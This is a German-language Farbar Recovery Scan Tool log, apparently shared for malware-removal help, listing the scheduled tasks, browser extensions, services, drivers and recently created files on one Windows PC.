HKLM\...\Windows x64\Print Processors\Canon TS3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDR.DLL [482816 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3100 series: C:\Windows\system32\CNMLMDR.DLL [1302016 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0DB9E82B-D44C-40B1-9034-BF52926268FF} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614868383 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {18F7131B-A6D1-444B-8F9F-8574666B92FA} - System32\Tasks\Opera GX scheduled Autoupdate 1615284024 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software)
Task: {1F3544CA-9EFA-426B-8B3D-6DD251BE9242} - System32\Tasks\AviraSystemSpeedupVerify => C:\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe [32819448 2022-07-01] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {272E4CE1-8F68-4EED-BFDF-6E01CFD5CFD6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {2F1B69C1-49C8-41BF-B8A8-7B8B33B47BC5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Update => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {301CE07D-A872-4027-8AAD-8A51F2F0C8A8} - System32\Tasks\Avira_Security_Update => C:\Windows\system32\net.exe [59904 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {3240C50E-D84D-4B02-9021-A4B8F23E397F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {36B59BFE-92C3-4577-9EB3-A48F37E15056} - System32\Tasks\Opera scheduled assistant Autoupdate 1609849435 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(1): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> FallbackTelemetry
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(2): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> ServiceWatchdog
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(3): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> CrashCollector
Task: {3B74C5CB-076B-4ACD-8A2A-40E25465D4D5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3E333973-E2EA-4CE4-B258-1D35A3344F13} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {425FFDD3-B209-458B-9A38-8764E722FEA7} - System32\Tasks\Opera scheduled Autoupdate 1609849433 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software)
Task: {4302A2A9-ABB0-4CAB-A43A-120C6F8D8BE2} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\3 => C:\Users\chris\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
Task: {44B6801D-33B6-4F15-ADA5-F76C4EC8B8F0} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {4FBF287D-3855-45E8-B865-5291BD52CAD0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {514BFB18-1EBB-496F-AF5C-58FD5213D334} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\2 => C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4110832 2022-07-06] (Opera Norway AS -> Opera Software)
Task: {529E7201-1539-496A-8FE1-D748E8764182} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\2 => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1313408 2017-07-05] (Canon Inc. -> CANON INC.)
Task: {58DC8299-CE2F-40AB-B652-6335B77E0B7E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {591A781E-5EB7-49FC-ABEF-B22213FC4B88} - System32\Tasks\SS3svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3svc64.exe [811520 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {68E93379-3488-418A-BF23-D339D2B6828B} - System32\Tasks\Avira_Security_Service_SCM_Watchdog => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe [256800 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {83FCF623-1808-4FBD-AD1E-7356AB826511} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8CEF75DB-D658-4A21-9C63-AEDA4DBFFC2D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {92B83629-F377-4970-B04B-2291F6FF0EA6} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\3 => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [68822328 2021-03-09] (Discord Inc. -> Discord Inc.)
Task: {9FD325D7-7CAB-4139-BE9E-656333181255} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {A4D9313F-C284-4987-80C7-F9D78201EB7F} - System32\Tasks\SS3svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {A9A13680-DAAC-4128-B91D-DFD221E78568} - System32\Tasks\Avira\System Speedup\TestScheduler => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
Task: {B2FD02AD-5959-477B-B633-8CDCADA4E7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {C0A61414-43CC-44A1-A233-01EA19897827} - System32\Tasks\Avira_Security_Systray => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe [1642080 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {C1C26AF1-D81F-4EFD-A7F0-0916DF2A7093} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1618593618 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {C5A5E07E-6868-4265-B175-EB2639160ED0} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C93A8B38-65E0-47B2-92AC-F1FB04D75E19} - System32\Tasks\MATLAB R2020b Startup Accelerator => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe [53760 2020-07-29] () [Datei ist nicht signiert]
Task: {D741A068-3D6E-4244-BFA4-F2F9088FE746} - System32\Tasks\Opera GX scheduled Autoupdate 1610475719 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software)
Task: {DD075DC3-40A4-44A3-8123-188C0334D30F} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\1 => C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe [2154696 2020-12-13] (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.)
Task: {E7C6AF9B-6449-4ABE-8F51-977D7F9569DB} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\4 => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {F6A0EEF0-54C6-4191-B0A3-92DC38612038} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F8C2DD18-065A-47DE-B229-1C94A20EF5AE} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F902C571-8663-425B-B606-A4482E01E1EA} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F94F6760-4107-4CA7-AEFB-57E6BD017C78} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\MATLAB R2020b Startup Accelerator.job => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{638dd5ca-05dc-4f0a-8232-6b6c4fda51ff}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{da30106f-af18-4b8c-8cce-01f0c7abbe79}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e2fef4cc-039a-4676-8f28-84e9c961b5ec}: [NameServer] 141.44.1.1,141.44.1.2

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default [2022-07-21]
Edge Extension: (Outlook) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-10]
Edge Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caiblelclndcckfafdaggpephhgfpoip [2022-07-03]
Edge Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emgfgdclgfeldebanedpihppahgngnle [2022-07-15]
Edge Extension: (Word) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-10]
Edge Extension: (Excel) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-10]
Edge Extension: (PowerPoint) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-10]
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
Edge HKLM-x32\...\Edge\Extension: [emgfgdclgfeldebanedpihppahgngnle]

FireFox:
========
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2019-07-02] (CANON INC.) [Datei ist nicht signiert]

Chrome: 
=======
CHR Profile: C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default [2022-07-20]
CHR Notifications: Default -> hxxps://web.whatsapp.com
CHR Extension: (Slides) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-12-10]
CHR Extension: (Docs) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-12-10]
CHR Extension: (Google Drive) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-12-10]
CHR Extension: (YouTube) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-12-10]
CHR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2022-06-19]
CHR Extension: (Watch2Gether) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\cimpffimgeipdhnhjohpbehjkcdpjolg [2022-05-18]
CHR Extension: (Sheets) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-12-10]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2022-05-18]
CHR Extension: (NordVPN – VPN Proxy for Privacy & Security) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjoaledfpmneenckfbpdfhkmimnjocfa [2022-06-19]
CHR Extension: (Google Docs Offline) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-04-27]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-05-18]
CHR Extension: (Excel Online) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2020-12-10]
CHR Extension: (Cashback service LetyShops) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2022-06-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-12-10]
CHR Extension: (De-Fakeator) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pldoiobdcjagdiiphgfmbggpgmhkkaff [2020-12-10]
CHR HKLM\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

Opera: 
=======
OPR Profile: C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable [2022-07-21]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\dalelnnofafalcmkmnhdbigbjjkloabo [2021-01-05]
OPR Extension: (Rich Hints Agent) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-01-05]
OPR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\ngohaaocccbohaffogpbgfpmpgbcgccg [2021-01-05]
OPR Extension: (Free Avira Phantom VPN – Entsperrt Webseiten) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\pcgkmkjdikhiodinhloioejnpjgmfigd [2021-01-05]
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1001) Opera GXStable - "C:\Users\chris\AppData\Local\Programs\Opera GX\Launcher.exe"
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1006) Opera GXStable - "C:\Users\Lisa\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [768408 2022-07-20] (ASUSTeK Computer Inc. -> )
R2 AviraOptimizerHost; C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe [3000608 2022-03-25] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [386864 2022-03-30] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraSecurity; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe [264400 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
S2 AviraSecurityUpdater; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Common.Updater.exe [282464 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
R2 EndpointProtectionService; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 EndpointProtectionService2; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [342456 2020-12-08] (FUTUREMARK INC -> Futuremark)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [445432 2021-04-19] (Canon Inc. -> )
R2 nordvpn-service; C:\Program Files\NordVPN\nordvpn-service.exe [280440 2021-06-05] (nordvpn s.a. -> TEFINCOM S.A.)
S3 OVRLibraryService; C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe [148064 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 OVRService; C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe [514656 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2022-03-17] (Even Balance, Inc. -> )
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2028568 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [461336 2021-11-30] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1349688 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; D:\Synapse3\Service\Razer Synapse Service.exe [298056 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2022-02-18] (Razer USA Ltd. -> Razer Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 BdSentry; C:\Windows\System32\DRIVERS\BdSentry.sys [230520 2022-06-21] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 NDivert; C:\Program Files\NordVPN\Drivers\NDivert.sys [128856 2021-06-09] (nordvpn s.a. -> Nordvpn S.A.)
R1 netprotection_network_filter; C:\Windows\System32\drivers\netprotection_network_filter.sys [100128 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 netprotection_network_filter2; C:\Windows\System32\drivers\netprotection_network_filter2.sys [100376 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 nlwt; C:\Windows\system32\DRIVERS\nlwt.sys [39360 2020-12-10] (TEFINCOM S.A. -> WireGuard LLC)
R1 nordlwf; C:\Windows\system32\DRIVERS\nordlwf.sys [38608 2020-10-14] (TEFINCOM S.A. -> TEFINCOM S.A.)
R3 oculusvad_oculusvad; C:\Windows\System32\drivers\oculusvad.sys [75280 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 Oculus_ViGEmBus; C:\Windows\System32\drivers\Oculus_ViGEmBus.sys [32856 2022-03-02] (Oculus VR, LLC -> Facebook Inc.)
S0 rtp_elam; C:\Windows\System32\DRIVERS\rtp_elam.sys [24024 2022-06-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Avira Operations GmbH)
R2 rtp_filesystem_filter; C:\Windows\System32\DRIVERS\rtp_filesystem_filter.sys [202584 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_process_monitor; C:\Windows\system32\DRIVERS\rtp_process_monitor.sys [193304 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_traverse; C:\Windows\system32\DRIVERS\rtp_traverse.sys [47560 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R3 RzCommon; C:\Windows\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0065; C:\Windows\System32\drivers\RzDev_0065.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167280 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapnordvpn; C:\Windows\System32\drivers\tapnordvpn.sys [44896 2020-06-09] (TEFINCOM S.A. -> The OpenVPN Project)
R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.)
R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [19600 2020-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49576 2022-07-14] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [452856 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [91384 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\Windows\system32\DRIVERS\wintun.sys [29680 2021-10-07] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 11:52 - 2022-07-21 11:52 - 000000000 ____D C:\AdwCleaner
2022-07-21 11:51 - 2022-07-21 11:51 - 008551608 _____ (Malwarebytes) C:\Users\chris\Desktop\adwcleaner.exe
2022-07-20 22:19 - 2022-07-21 12:19 - 000000000 ____D C:\Users\chris\Downloads\FRST
2022-07-20 16:58 - 2022-07-20 16:58 - 000157105 _____ C:\Users\chris\Downloads\rechnung-FM.F22014940233.pdf
2022-07-19 12:28 - 2022-07-21 12:20 - 000000000 ____D C:\FRST
2022-07-17 21:40 - 2022-07-17 21:40 - 2467378443 _____ C:\Windows\MEMORY.DMP
2022-07-17 21:40 - 2022-07-17 21:40 - 005480100 _____ C:\Windows\Minidump\071722-8656-01.dmp
2022-07-14 23:16 - 2022-07-14 23:24 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2022-07-14 23:15 - 2022-07-14 23:15 - 000000000 ____D C:\Windows\pss
2022-07-14 19:43 - 2022-06-15 09:28 - 000100376 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter2.sys
2022-07-14 18:27 - 2022-07-14 18:27 - 000003888 _____ C:\Windows\system32\Tasks\Avira_Security_Maintenance
2022-07-14 18:27 - 2022-07-14 18:27 - 000003428 _____ C:\Windows\system32\Tasks\Avira_Security_Service_SCM_Watchdog
